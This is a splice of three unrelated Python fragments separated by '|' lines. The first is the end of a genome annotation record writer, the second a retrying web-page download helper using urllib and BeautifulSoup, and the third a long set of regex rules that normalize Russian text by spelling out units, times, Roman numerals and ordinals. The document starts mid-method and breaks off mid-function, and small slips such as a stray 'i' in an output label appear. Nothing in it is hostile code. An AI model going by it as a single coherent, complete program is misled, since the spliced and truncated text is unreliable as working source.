        FILE_HANDLE.write("%s" % ("Annotation record ===\n"))
        FILE_HANDLE.write("%s%s%s" % ("Source:",self.source,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Method:",self.method,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Type:",self.annotationType,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Contig:",self.contig,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Start:",self.start,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("End:",self.end,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Strand:",self.strand,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Reading Frame:",self.readingFrame,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Identifier:",self.identifier,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Locus Tag:",self.locusTag,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Name:",self.name,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Description:",self.description,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Category:",self.category,"\n"))
        FILE_HANDLE.write("%s%s%s" % ("Wraparound:",self.wraparound,"\n"))
        FILE_HANDLE.write("%s" % ("Annotation List:i\n"))
        for annot in self.annotationList:
            FILE_HANDLE.write("%s%s%s" % ("  ",annot,"\n"))
        FILE_HANDLE.write("%s" % ("Paralog List:\n"))
        for paralog in self.paralogList:
            FILE_HANDLE.write("%s%s%s" % ("  ",paralog,"\n"))
        FILE_HANDLE.write("%s" % ("=======================\n"))
|
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
import http.client
from socket import timeout
from requests.exceptions import ConnectionError
import json, sys
def descargarResultadoData(URL, TIMEOUT, INTENTS, DATA, HEADERS):
    """Download *URL* and return it parsed as a BeautifulSoup object.

    Returns '' when URL is falsy or when every attempt fails.
    DATA and HEADERS are accepted for interface compatibility but are not
    currently sent with the request (as in the original implementation).

    Fixes:
    - the retry counter was never incremented, so the INTENTS (attempts)
      parameter was ignored entirely;
    - transient network errors (URLError, socket timeout) crashed the
      caller; they are now retried up to INTENTS times;
    - the magic sentinel `tries = 12` is replaced with `break`.
    """
    if not URL:
        return ''
    pagina = ''
    attempts = INTENTS if INTENTS else 10  # preserve roughly the old cap
    tries = 0
    while tries < attempts:
        try:
            req = urllib.request.Request(URL)
            response = urllib.request.urlopen(req, timeout=TIMEOUT)
            html = response.read().decode('utf-8')
            pagina = BeautifulSoup(html, 'html.parser')
            break
        except KeyboardInterrupt:
            print('The user abort the script.')
            sys.exit()
        except HTTPError:
            # Hard HTTP error (e.g. 404): retrying will not help.
            break
        except (URLError, timeout):
            # Transient network problem: retry.
            tries += 1
    return pagina
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# В этом файле определены правила.
from re import finditer, sub
from .templates import (units, zh_units,
forms,
pre_acc, pre_units,
r_ca, d_ca, v_ca, t_ca, p_ca,
adj_pad, mn_pad, mu_pad, sr_pad, zh_pad)
from .functions import (condition, cardinal, ordinal, roman2arabic, replace,
substant, feminin, daynight, decimal)
from .words_forms import Words, M_GENDER, Z_GENDER, S_GENDER
# Word-attribute lookup (gender/case) shared by all the rules below.
words = Words()
class RuleBase():
    """
    Base class for all text-normalization rules.
    """
    def __init__(self):
        self.mask = '' # regular expression used to find matches (the mask)
    def run(self, text, debug=False):
        """
        Apply the rule to *text*: every mask match for which check()
        returns a replacement string is substituted in place.
        """
        length = len(text)
        for m in finditer(self.mask, text):
            new = self.check(m)
            if new is not None:
                text = replace(text, new, length, m.start(), m.end())
                if debug:
                    print('Сработало правило: %s' % self.__class__.__name__)
                    print('   найдено: "%s"\n'
                          '  заменено: "%s"\n' % (m, new))
        return text
    def check(self, m):
        """
        Validate and process a single mask match.
        Must return the replacement string, or None to leave it untouched.
        """
        pass
class QuasiRoman(RuleBase):
    """
    Description: Cyrillic letters often appear in place of Latin ones
    inside Roman numerals; normalize them to Latin I/V/X.
    Example:
    """
    def __init__(self):
        self.mask = (r'\b(([ІVХIX]+( [-и] | или | [дп]о )'
                     r'(начал[аеоу] |конец |конц[аеу] |середин[аеуы] |'
                     r'началом |концом |серединой |)|)'
                     r'[ІVХIX]+ )(век[аеу]?|веках|веками?|веков|'
                     r'(сто|тысяче)лети(ем?|й|ю|ях?|ями?))\b')
    def check(self, m):
        # Only rewrite if a Cyrillic Х or І is actually present.
        if 'Х' in m.group(1) or 'І' in m.group(1):
            new = m.group(1)
            new = sub('І', 'I', new)
            new = sub('Х', 'X', new)
            return new + m.group(5)
        else:
            return None
class UnitRule_1(RuleBase):
    """
    Description: units of measure; accusative case (after prepositions and
    verbs such as "за", "на", "про", "спустя", "через", ...).
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b(([Зз]а|[Нн]а|[Пп]ро|[Сс]пустя|[Чч]ерез|'
            r'состав[авеийлотшщьюя]{2,6}|превы[сш][авеийлотшщьюя]{2,5}) (бы |)'
            r'((\d+,|)(\d+) - |)(\d+,|)(\d+)) ' + units)
    def check(self, m):
        new = m.group(1) + ' '
        # group(7): a decimal comma part is present -> use the unit's
        # special (genitive) form; otherwise decline via substant().
        if m.group(7):
            new += forms[m.group(9)][2]
        else:
            new += substant(m.group(8), m.group(9), 5)
        return new
class UnitRule_2(RuleBase):
    """
    Description: units of measure; accusative case after a noun + "в".
    Example: "диаметром в 2 см -> диаметром в 2 сантиметра"
    """
    def __init__(self):
        self.mask = (
            r'\b([А-Яа-яё]{3,})'
            r'( (всего |ориентировочно |примерно |приблизительно |более чем |'
            r'не более чем |стрельбы |пол[её]та |пуска |)в '
            r'((\d+,|)(\d+) - |)(\d+,|)(\d+)) ' + units)
    def check(self, m):
        # Normalize 'ё' so the preceding word can be matched against pre_acc.
        preacc = sub('ё', 'е', m.group(1).lower())
        if preacc in pre_acc and (m.group(9) in pre_units or m.group(9) in
                                  ('тыс.', 'млн', 'млрд')):
            new = m.group(1) + m.group(2) + ' '
            if m.group(7):
                new += forms[m.group(9)][2]
            else:
                new += substant(m.group(8), m.group(9), 5)
            return new
        else:
            return None
class UnitRule_13(RuleBase):
    """
    Description: abbreviated cardinal-number words (тыс./млн/...);
    prepositional case.  Nearly identical to UnitRule_10 but guarded by
    the unit being in pre_units.
    Example: "в 1 тыс. км -> в 1 тысяче км"
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв] )((\d+,|)(\d+)( [-и] | или )|)'
            r'(\d+,|)(\d+) (тыс\.|млн|млрд|трлн) ' + units)
    def check(self, m):
        if m.group(9) in pre_units:
            new = m.group(1)
            if m.group(2):
                if m.group(3):
                    new += decimal(m.group(3)[:-1], m.group(4), 4)
                else:
                    # 'тыс.' is feminine; the others are masculine.
                    if m.group(8) == 'тыс.':
                        new += feminin(cardinal(m.group(4), p_ca), 4)
                    else:
                        new += cardinal(m.group(4), p_ca)
                new += m.group(5)
            if m.group(6):
                new += decimal(m.group(6)[:-1], m.group(7), 4) + ' '
                new += forms[m.group(8)][2]
            else:
                new += m.group(7) + ' ' + substant(m.group(7), m.group(8), 4)
            return new + ' ' + m.group(9)
        else:
            return None
class UnitRule_14(RuleBase):
    """
    Description: units of measure; dative/accusative case after "в".
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв] ((\d+,|)\d+ - |)(\d+,|)(\d+) )' + units)
    def check(self, m):
        new = m.group(1)
        if m.group(4):
            # Decimal value present -> special unit form.
            new += forms[m.group(6)][2]
        else:
            # Case index depends on whether the unit takes the prepositional.
            if m.group(6) in pre_units:
                new += substant(m.group(5), m.group(6), 4)
            else:
                new += substant(m.group(5), m.group(6), 5)
        return new
class UnitRule_15(RuleBase):
    """
    Description: distance units with the preposition "с"; genitive case.
    Example: "с 5 км -> с 5 километров"
    """
    def __init__(self):
        self.mask = (
            r'\b([Сс] (\d+ - |)(\d+) )((тыс\.) |)(к?м)')
    def check(self, m):
        new = m.group(1)
        if m.group(4):
            # "тыс." present: decline it and keep the unit abbreviation.
            new += substant(m.group(3), m.group(5), 1) + ' ' + m.group(6)
        else:
            new += substant(m.group(3), m.group(6), 1)
        return new
class UnitRule_10(RuleBase):
    """
    Description: abbreviated cardinal-number words (тыс./млн/...) with a
    spelled-out distance unit; prepositional case.  Same logic as
    UnitRule_13 but without the pre_units guard.
    Example: "в 1 тыс. километров -> в 1 тысяче километров"
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв] )((\d+,|)(\d+)( [-и] | или )|)'
            r'(\d+,|)(\d+) (тыс\.|млн|млрд|трлн) '
            r'(километров|(морских |)миль|парсек(ов|)|световых лет)\b')
    def check(self, m):
        new = m.group(1)
        if m.group(2):
            if m.group(3):
                new += decimal(m.group(3)[:-1], m.group(4), 4)
            else:
                # 'тыс.' is feminine; the others are masculine.
                if m.group(8) == 'тыс.':
                    new += feminin(cardinal(m.group(4), p_ca), 4)
                else:
                    new += cardinal(m.group(4), p_ca)
            new += m.group(5)
        if m.group(6):
            new += decimal(m.group(6)[:-1], m.group(7), 4) + ' '
            new += forms[m.group(8)][2]
        else:
            new += m.group(7) + ' ' + substant(m.group(7), m.group(8), 4)
        return new + ' ' + m.group(9)
class UnitRule_3(RuleBase):
    """
    Description: units of measure; genitive case in "от ... до ..." ranges.
    Example: "от 1 до 4 км -> от 1 до 4 километров"
    """
    def __init__(self):
        self.mask = (r'\b([Оо]т |[Сс]о? )(((\d+,|)\d+ - |)(\d+,|)\d+ '
                     r'до ((\d+,|)\d+ - |)(\d+,|)(\d+) )' + units)
    def check(self, m):
        # group(8): decimal comma on the upper bound -> special unit form.
        if m.group(8):
            new = forms[m.group(10)][2]
        else:
            new = substant(m.group(9), m.group(10), 1)
        return m.group(1) + m.group(2) + new
class UnitRule_4(RuleBase):
    """
    Description: units of measure; genitive case after a long list of
    prepositions/verbs ("более", "около", "достигает", ...).

    Fix: the original mask contained `[Дд]остигше[ейм|[Дд]остигавше[ейм]`
    -- a missing `]` merged the two alternatives into one bogus character
    class (containing `|`, `[`, `Д`, `д`, `о`, `с`, ...), so neither word
    form matched as intended.  Restored to
    `[Дд]остигше[ейм]|[Дд]остигавше[ейм]`.
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b('
            r'[Бб]олее|[Мм]енее|[Бб]ольше|[Мм]еньше|[Вв]ыше|[Нн]иже|[Дд]альше|'
            r'[Оо]коло|[Сс]выше|[Дд]ля|[Дд]о|[Ии]з|[Оо]т|[Вв]место|[Дд]линнее|'
            r'[Вв] размере|[Бб]лиже|[Вв] течение|[Вв] количестве|[Вв] пределах|'
            r'[Дд]ости[гчаетья]{1,4}|[Дд]остига?л[аио]?|[Дд]остигн[еу]т|'
            r'[Дд]остигши[еймх]|[Дд]остигавши[еймх]|[Дд]остигш[аеигмоуя]{2,3}|'
            r'[Дд]остигавш[аеигмоуя]{2,3}|[Дд]остигше[ейм]|[Дд]остигавше[ейм]|'
            r'[Вв]ладел[аеимухцыь]{2,5}|[Пп]ротив|[Пп]орядка|[Пп]осле|'
            r'[Нн]а уровне|[Ээ]тих [а-яё]+[иы]х|[Ээ]тих|[Рр]анее|'
            r'[Нн]е превы[сш][аи][авеийолтшщюья]{1,4}'
            r')'
            r'( приблизительно | примерно | почти | более чем | менее чем '
            r'| плюс | минус | максимум | минимум | )'
            r'((\d+,|)(\d+)( - | или | и )'
            r'(плюс |минус |)|)(\d+,|)(\d+) ' + units)
    def check(self, m):
        # Optional leading number of a range ("N - M", "N или M", ...).
        if m.group(3):
            if m.group(4):
                prenum = decimal(m.group(4)[:-1], m.group(5), 1)
            else:
                prenum = cardinal(m.group(5), r_ca)
                # Feminine units need the feminine ending on "один" etc.
                if condition(m.group(5)) and m.group(10) in zh_units:
                    prenum = prenum[:-2] + 'й'
            prenum += m.group(6) + m.group(7)
        else:
            prenum = ''
        # The main number plus the declined unit.
        if m.group(8):
            number = decimal(m.group(8)[:-1], m.group(9), 1)
            number += ' ' + forms[m.group(10)][2]
        else:
            number = cardinal(m.group(9), r_ca)
            if condition(m.group(9)) and m.group(10) in zh_units:
                number = number[:-2] + 'й'
            number += ' ' + substant(m.group(9), m.group(10), 1)
        return m.group(1) + m.group(2) + prenum + number
class UnitRule_5(RuleBase):
    """
    Description: units of measure; genitive case in "от/с ... до ..."
    constructions where the second number has no unit of its own.
    Example: "С 10 кВт до 12 -> С десяти киловатт до двенадцати"
    """
    def __init__(self):
        self.mask = (
            r'\b(([Оо]т|[Сс]) '
            r'(почти |примерно |приблизительно |плюс |минус |'
            r'более чем |менее чем|))'
            r'((\d+,|)(\d+) - |)(\d+,|)(\d+) '
            r'([%°\℃ВКМ£₽\$\.²³_БВГМагдеклмнпрстцш\']+)'
            r'( (в час |в секунду |[а-яё]{3,} |)до '
            r'(почти |примерно |приблизительно |плюс |минус |'
            r'более чем |менее чем|))(((\d+,|)(\d+) - |)(\d+,|)(\d+)|)\b')
    def check(self, m):
        # Only act on this explicit whitelist of unit abbreviations/symbols;
        # the loose character-class mask above can overmatch otherwise.
        if m.group(9) in ('%', '°', "'", '℃', 'В', 'К', 'М', '£', '₽', '$',
                          'кГц', 'МГц', 'ГГц', 'Гц', 'кпк', 'Мпк', 'Гпк', 'пк',
                          'кг', 'мг', '_г', 'мкм', 'км', 'см', 'мм', 'м',
                          'км²', 'см²', 'мм²', 'м²', 'км³', 'см³', 'мм³', 'м³',
                          'кт', 'Мт', 'т', 'кВт', 'МВт', 'ГВт', 'Вт', 'га', 'л',
                          'дБ', 'сек', 'л.с.', 'а.е.', 'шт.', 'ед.', 'тыс.',
                          'млн', 'млрд', 'трлн', 'атм'):
            # First number (optionally a range) with the declined unit.
            number1 = ''
            if m.group(4):
                if m.group(5):
                    number1 = decimal(m.group(5)[:-1], m.group(6), 1)
                else:
                    number1 = cardinal(m.group(6), r_ca)
                    # Feminine units adjust the numeral ending.
                    if m.group(9) in zh_units and condition(m.group(6)):
                        number1 = number1[:-2] + 'й'
                number1 += ' - '
            else:
                number1 = ''
            if m.group(7):
                number1 += decimal(m.group(7)[:-1], m.group(8), 1)
                number1 += ' ' + forms[m.group(9)][2]
            else:
                number1 += cardinal(m.group(8), r_ca)
                if m.group(9) in zh_units and condition(m.group(8)):
                    number1 = number1[:-2] + 'й'
                number1 += ' ' + substant(m.group(8), m.group(9), 1)
            # Second number after "до" (unit implied from the first).
            if m.group(13):
                if m.group(14):
                    if (not m.group(15) and m.group(9) in zh_units
                            and condition(m.group(16))):
                        number2 = cardinal(m.group(16), r_ca)[:-2] + 'й'
                        number2 += ' - '
                    else:
                        number2 = m.group(14)
                else:
                    number2 = ''
                if m.group(17):
                    number2 += decimal(m.group(17)[:-1], m.group(18), 1)
                else:
                    number2 += cardinal(m.group(18), r_ca)
                    if m.group(9) in zh_units and condition(m.group(18)):
                        number2 = number2[:-2] + 'й'
            else:
                number2 = ''
            return m.group(1) + number1 + m.group(10) + number2
        else:
            return None
class UnitRule_6(RuleBase):
    """
    Description: units of measure; dative case after "к", "равен",
    "равняется", "эквивалентен", etc.
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b(([Кк]|равная?|равн[оы][ей]?|равен'
            r'|равняться|равнял[аио]сь|равнялся|равняется|эквивалент[аеноы]{2})'
            r'( всего | почти | примерно | приблизительно | плюс | минус | )'
            r')'
            r'(\d+,|)(\d+) ' + units)
    def check(self, m):
        # group(4): decimal comma part -> spell the fraction, special form.
        if m.group(4):
            number = decimal(m.group(4)[:-1], m.group(5), 2)
            number += ' ' + forms[m.group(6)][2]
        else:
            number = m.group(5) + ' ' + substant(m.group(5), m.group(6), 2)
        return m.group(1) + number
class UnitRule_7(RuleBase):
    """
    Description: units of measure; dative case with the distributive
    preposition "по" ("по 21 ...", "по 1000 ...").
    Example:
    """
    def __init__(self):
        # Matches numbers ending in 1 (but not 11) and round 1/1000/... .
        self.mask = (r'\b([Пп]о (\d*[02-9]1|1(000){0,3})) ' + units)
    def check(self, m):
        return m.group(1) + ' ' + substant(m.group(2), m.group(4), 2)
class UnitRule_16(RuleBase):
    """
    Description: units of measure; instrumental case after
    "между N ... и M <unit>".
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b([Мм]ежду (\d+,|)(\d+) [а-я]+ ([а-я]+ |)и )'
            r'(\d+,|)(\d+) ' + units)
    def check(self, m):
        new = m.group(1)
        # group(5): decimal comma part on the second number.
        if m.group(5):
            new += decimal(m.group(5)[:-1], m.group(6), 3) + ' '
            new += forms[m.group(7)][2]
        else:
            new += m.group(6) + ' ' + substant(m.group(6), m.group(7), 3)
        return new
class UnitRule_8(RuleBase):
    """
    Description: units of measure; instrumental case after "между", "над",
    "с", "владеет", "по сравнению с", etc.
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b(([Мм]ежду|[Нн]ад|[Сс]|[Вв]ладе[авеийлмтюшщья]{1,7}|'
            r'[Пп]о сравнению со?|[Вв] сравнении со?) '
            r'(более чем |почти |приблизительно |примерно |плюс |минус |))'
            r'((\d+,|)(\d+)'
            r'( [-и] (почти |приблизительно |примерно |плюс |минус |))|)'
            r'(\d+,|)(\d+) ' + units)
    def check(self, m):
        new = m.group(1)
        # a: an integer range prefix is present (no decimal comma on it).
        a = m.group(4) and not m.group(5)
        if a and condition(m.group(6)) and m.group(11) in zh_units:
            # Feminine unit: use the feminine instrumental ending ("одной").
            new += cardinal(m.group(6), t_ca)[:-2] + 'ой' + m.group(7)
        else:
            new += m.group(4)
        if m.group(9):
            new += decimal(m.group(9)[:-1], m.group(10), 3) + ' '
            new += forms[m.group(11)][2]
        else:
            new += m.group(10) + ' ' + substant(m.group(10), m.group(11), 3)
        return new
class UnitRule_9(RuleBase):
    """
    Description: units of measure; prepositional case after "о"/"об"/"при".
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b(([Оо]б?|[Пп]ри) '
            r'((около |почти |приблизительно |примерно |плюс |минус |)'
            r'(\d+,|)(\d+) ([-и]|или) |)'
            r'(около |почти |приблизительно |примерно |плюс |минус |)'
            r'(\d+,|)(\d+)) ' + units
            )
    def check(self, m):
        # group(9): decimal comma part -> special unit form.
        if m.group(9):
            pre = forms[m.group(11)][2]
        else:
            pre = substant(m.group(10), m.group(11), 4)
        return m.group(1) + ' ' + pre
class UnitRule_11(RuleBase):
    """
    Description: units of measure; nominative case (bare "N <unit>").
    Example:
    """
    def __init__(self):
        self.mask = (r'\b(((\d+),|)(\d+)) ' + units)
    def check(self, m):
        # group(2): number has a decimal comma -> special unit form.
        if m.group(2):
            return m.group(1) + ' ' + forms[m.group(5)][2]
        else:
            return m.group(1) + ' ' + substant(m.group(4), m.group(5))
class UnitRule_12(RuleBase):
    """
    Description: units of measure; nominative case after spelled-out large
    numbers ("тысяч ...", "миллионов ...", "-й степени ...").
    Example:
    """
    def __init__(self):
        self.mask = (
            r'('
            r'-й степени|тысяч(|ами|а[мх]?|ей?|и|у)|'
            r'(миллион|миллиард|триллион)(|ами|а[мх]?|о[вм]|[еу])'
            r') ' + units)
    def check(self, m):
        # Uses form index 1 (plural/counting form) of the unit.
        return m.group(1) + ' ' + forms[m.group(5)][1]
class TimeRule_1(RuleBase):
    """
    Description: time in the format "(h)h ч (m)m мин" -- expand the
    abbreviations into the correctly declined words.
    Example:
    """
    def __init__(self):
        self.mask = (r'\b([012]?\d) ?ч ?([0-5]?\d) ?мин\b')
    def check(self, m):
        # Russian numeral agreement: 1 -> час, 2-4 -> часа, else часов.
        if condition(m.group(1)):
            hours = ' час '
        elif m.group(1) in ('2', '3', '4', '02', '03', '04', '22', '23', '24'):
            hours = ' часа '
        else:
            hours = ' часов '
        # Same agreement pattern for minutes (feminine: минута/минуты/минут).
        if condition(m.group(2)):
            minutes = ' минута'
        elif m.group(2) in ('2', '3', '4', '02', '03', '04',
                            '22', '23', '24', '32', '33', '34',
                            '42', '43', '44', '52', '53', '54'):
            minutes = ' минуты'
        else:
            minutes = ' минут'
        return m.group(1) + hours + feminin(m.group(2)) + minutes
class TimeRule_2(RuleBase):
    """
    Description: time in the format "(ч)ч:мм" or "(ч)ч.мм" after "в"/"на".
    Example:
    """
    def __init__(self):
        # (?!\.\d) avoids treating a decimal fraction as a time.
        self.mask = (r'\b(([Вв]|[Нн]а) [012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
    def check(self, m):
        # NOTE(review): the trailing '_' looks like a downstream marker
        # understood by later processing -- confirm its meaning.
        return m.group(1) + ' ' + feminin(m.group(3), 5) + '_'
class TimeRule_3(RuleBase):
    """
    Description: time in the format "(ч)ч:мм"/"(ч)ч.мм" after "к";
    dative case.
    Example:
    """
    def __init__(self):
        self.mask = (r'\b([Кк] )([012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
    def check(self, m):
        hours = cardinal(m.group(2), d_ca)
        minutes = cardinal(m.group(3), d_ca)
        if m.group(3) == '00':
            # Keep "00" literal (e.g. "к 10:00" -> "к десяти 00").
            minutes = '00'
        else:
            # '0_ ' preserves the leading zero ("ноль ...") in speech.
            if m.group(3)[0] == '0':
                minutes = '0_ ' + minutes
            minutes = feminin(minutes, 2)
        return m.group(1) + hours + ' ' + minutes
class TimeRule_4(RuleBase):
    """
    Description: time in the format "(ч)ч:мм"/"(ч)ч.мм" after
    "до"/"после"/"около"/"с"; genitive case.
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b([Дд]о |[Пп]осле |[Оо]коло |[Сс] )'
            r'([012]?\d)[:.]([0-5]\d)\b(?!\.\d)')
    def check(self, m):
        hours = cardinal(m.group(2), r_ca)
        minutes = cardinal(m.group(3), r_ca)
        if m.group(3) == '00':
            # Keep "00" literal.
            minutes = '00'
        else:
            # '0_ ' preserves the leading zero in speech.
            if m.group(3)[0] == '0':
                minutes = '0_ ' + minutes
            minutes = feminin(minutes, 1)
        return m.group(1) + hours + ' ' + minutes
class RomanRule(RuleBase):
    """
    Description: pairs of Roman numerals before "век"/"тысячелетие"/
    "столетие"/"поколение"; the ending of the following noun selects the
    grammatical case of the ordinals.
    Example:
    """
    def __init__(self):
        self.mask = (
            r'\b([IVX]+)( [-и] )([IVX]+)( век(ами?|ах?|ов|е)'
            r'| (тысячелети|столети|поколени)(ями?|ях?|и|й))\b')
    def check(self, m):
        # The noun ending comes from group(5) ("век...") or group(7).
        if m.group(5):
            ending = m.group(5)
        else:
            ending = m.group(7)
        # Map the noun ending to (case, gender) for the ordinal words.
        if ending == 'а':
            num1 = ordinal(roman2arabic(m.group(1)), 'i_mu')
            num2 = ordinal(roman2arabic(m.group(3)), 'i_mu')
        elif ending == 'я':
            num1 = ordinal(roman2arabic(m.group(1)), 'i_sr')
            num2 = ordinal(roman2arabic(m.group(3)), 'i_sr')
        elif ending == 'ов' or ending == 'й':
            num1 = ordinal(roman2arabic(m.group(1)), 'r_mu')
            num2 = ordinal(roman2arabic(m.group(3)), 'r_mu')
        elif ending == 'ам' or ending == 'ям':
            num1 = ordinal(roman2arabic(m.group(1)), 'd_mu')
            num2 = ordinal(roman2arabic(m.group(3)), 'd_mu')
        elif ending == 'ами' or ending == 'ями':
            num1 = ordinal(roman2arabic(m.group(1)), 't_mu')
            num2 = ordinal(roman2arabic(m.group(3)), 't_mu')
        else:
            num1 = ordinal(roman2arabic(m.group(1)), 'p_mu')
            num2 = ordinal(roman2arabic(m.group(3)), 'p_mu')
        return num1 + m.group(2) + num2 + m.group(4)
class OrdinalRule_1(RuleBase):
    """
    Description: ordinal numerals; prepositional case.
    Example: "во 2 окне -> во втором окне"
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв]о?|[Нн]а|[Оо]б?|[Пп]ри) '
            r'(\d*[02-9]|\d*1\d)(( [а-яё]+[ео][йм]|) ([а-яё]{2,}))\b')
    def check(self, m):
        # Decide gender/case from the following noun's attributes.
        attr = words.get_attr(m.group(5))
        number = ''
        if attr.have([S_GENDER, M_GENDER], False, [5]):
            number = ordinal(m.group(2), 'p_mu')
        elif attr.have([Z_GENDER], False, [2, 5]):
            # Extra guards against misreading cardinal contexts ("в 2 ...").
            if len(m.group(2)) == 1 or m.group(2)[-2] != '1':
                a = m.group(2)[-1] not in ('2', '3', '4')
                b = m.group(1).lower() not in ('в', 'на')
                c = attr.have([Z_GENDER], False, [1])
                if a or b or not c:
                    number = ordinal(m.group(2), 'p_zh')
        if number:
            return m.group(1) + ' ' + number + m.group(3)
        return None
class OrdinalRule_2(RuleBase):
    """
    Description: ordinal numerals; genitive case.
    Example: "из 3 окна -> из третьего окна"
    """
    def __init__(self):
        self.mask = (
            r'\b([Сс]о?|[Ии]з|[Дд]ля|[Дд]о|[Кк]роме|[Оо]т|[Пп]осле) '
            r'(\d*1\d|\d*[02-9]?[02-9]) ([а-яё]+)\b')
    def check(self, m):
        # Time-of-day words after a number are cardinal contexts; skip them.
        if m.group(3) not in ('утра', 'дня', 'вечера', 'ночи'):
            number = ''
            attr = words.get_attr(m.group(3))
            if attr.have([M_GENDER, S_GENDER], False, [1]):
                number = ordinal(m.group(2), 'r_mu')
            elif attr.have([Z_GENDER], False, [1]):
                number = ordinal(m.group(2), 'r_zh')
            if number:
                return m.group(1) + ' ' + number + ' ' + m.group(3)
        else:
            return None
class OrdinalRule_3(RuleBase):
    """
    Description: ordinal numerals; instrumental case after "с"/"со".
    Example: "со 2 примером -> со вторым примером"
    """
    def __init__(self):
        self.mask = (r'\b([Сс]о? )(\d*1\d|\d*[02-9]?[02-9]) ([а-яё]+)\b')
    def check(self, m):
        number = ''
        # Gender of the following noun selects the ordinal form.
        attr = words.get_attr(m.group(3))
        if attr.have([M_GENDER, S_GENDER], False, [4]):
            number = ordinal(m.group(2), 't_mu')
        elif attr.have([Z_GENDER], False, [2, 4, 5]):
            number = ordinal(m.group(2), 't_zh')
        if number:
            return m.group(1) + number + ' ' + m.group(3)
        return None
class OrdinalRule_35(RuleBase):
    """
    Description: paired feminine ordinals ("N-й или M-й"); prepositional
    case.
    Example: "во 2-й или 3-й комнатах -> во второй или третьей комнатах"
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв]о?|[Нн]а|[Оо]б?|[Пп]ри) '
            r'(\d+)-й( или | и )(\d+)-й( ([а-я]+([ео]й|[иы]х) |)([а-яё]+))\b')
    def check(self, m):
        # Only applies when the trailing noun is feminine.
        attr = words.get_attr(m.group(8))
        if attr.have([Z_GENDER], None, [5]):
            new = m.group(1) + ' ' + ordinal(m.group(2), 'p_zh') + m.group(3)
            new += ordinal(m.group(4), 'p_zh') + m.group(5)
            return new
        return None
class OrdinalRule_36(RuleBase):
    """
    Description: ordinal numerals, feminine;
    genitive/dative/instrumental/prepositional case.
    Example: "(3-й, )4-й и 5-й бригад -> (третьей, )четвёртой и пятой бригад"
    """
    def __init__(self):
        self.mask = (r'\b((\d+)-й, |)(\d+)-й и (\d+)-й'
                     r'( ([а-я]+-|)[а-я]+[иы](х|ми?) | )([а-яё]+)\b')
    def check(self, m):
        # Requires a feminine plural noun in an oblique case.
        attr = words.get_attr(m.group(8))
        if attr.have([Z_GENDER], True, [1, 2, 4, 5]):
            if m.group(1):
                new = ordinal(m.group(2), 'r_zh') + ', '
            else:
                new = ''
            new += ordinal(m.group(3), 'r_zh') + ' и ' + ordinal(m.group(4), 'r_zh')
            return new + m.group(5) + m.group(8)
        else:
            return None
class OrdinalRule_37(RuleBase):
    """Ordinal numerals, masculine nominative pair.

    Example: "2-й и 3-й блок(и) -> второй и третий блок(и)"
    """
    def __init__(self):
        self.mask = (
            r'\b(\d+)-й( или | и )(\d+)-й( ([а-я]+([иы]й|[иы]е) |)([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(7))
        if attr.have([M_GENDER], None, [0]):
            new = ordinal(m.group(1), 'i_mu') + m.group(2)
            new += ordinal(m.group(3), 'i_mu') + m.group(4)
            return new
        return None
class OrdinalRule_38(RuleBase):
    """Ordinal numerals, neuter nominative pair.

    Example: "2-е и 3-е числа -> второе и третье числа"
    """
    def __init__(self):
        self.mask = (
            r'\b(\d+)-е( или | и )(\d+)-е( ([а-я]+([ео]е|[иы]е) |)([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(7))
        if attr.have([S_GENDER], None, [0, 3], only_case=True):
            new = ordinal(m.group(1), 'i_sr') + m.group(2)
            new += ordinal(m.group(3), 'i_sr') + m.group(4)
            return new
        return None
class OrdinalRule_39(RuleBase):
    """Ordinal numerals, nominative.

    Example: "2 груша -> вторая груша, 3 окно -> третье окно"
             "18 день -> восемнадцатый день",
             but not: "18 мегаватт, 2 дверь"
    """
    def __init__(self):
        self.mask = (
            r'(?<![,.])\b(\d*[02-9][02-9]|\d*1\d|[2-9]) ([а-яё]+)(?!-)\b')
    def check(self, m):
        number = ''
        attr = words.get_attr(m.group(2))
        # Masculine nominative -- but not measurement units whose plural
        # genitive coincides with the singular (listed explicitly).
        if (attr.have([M_GENDER], False, [0])
                and not attr.have([M_GENDER], True, [1])
                and not m.group(2) in ('грамм', 'кельвин', 'килограмм',
                                       'миллиграмм', 'мах','парсек', 'килопарсек',
                                       'мегапарсек', 'человек')):
            number = ordinal(m.group(1), 'i_mu')
        if attr.have([S_GENDER], False, [0]):
            number = ordinal(m.group(1), 'i_sr')
        if (attr.have([Z_GENDER], False, [0]) and not attr.have(case=[3])
                and m.group(2) != 'полка'):
            number = ordinal(m.group(1), 'i_zh')
        if number:
            return number + ' ' + m.group(2)
        return None
class OrdinalRule_4(RuleBase):
    """Ordinal numerals with "-м"/"-й" suffixes.
    "-м": instrumental/prepositional, masculine/neuter.
    "-й": masculine nominative, or feminine
    genitive/dative/instrumental/prepositional.

    Example: "на 8-м этаже -> на восьмом этаже"
    """
    def __init__(self):
        self.mask = (r'\b(\d+)-(м|й) ([А-Я]?[а-яё]+)\b')
    def check(self, m):
        number = ''
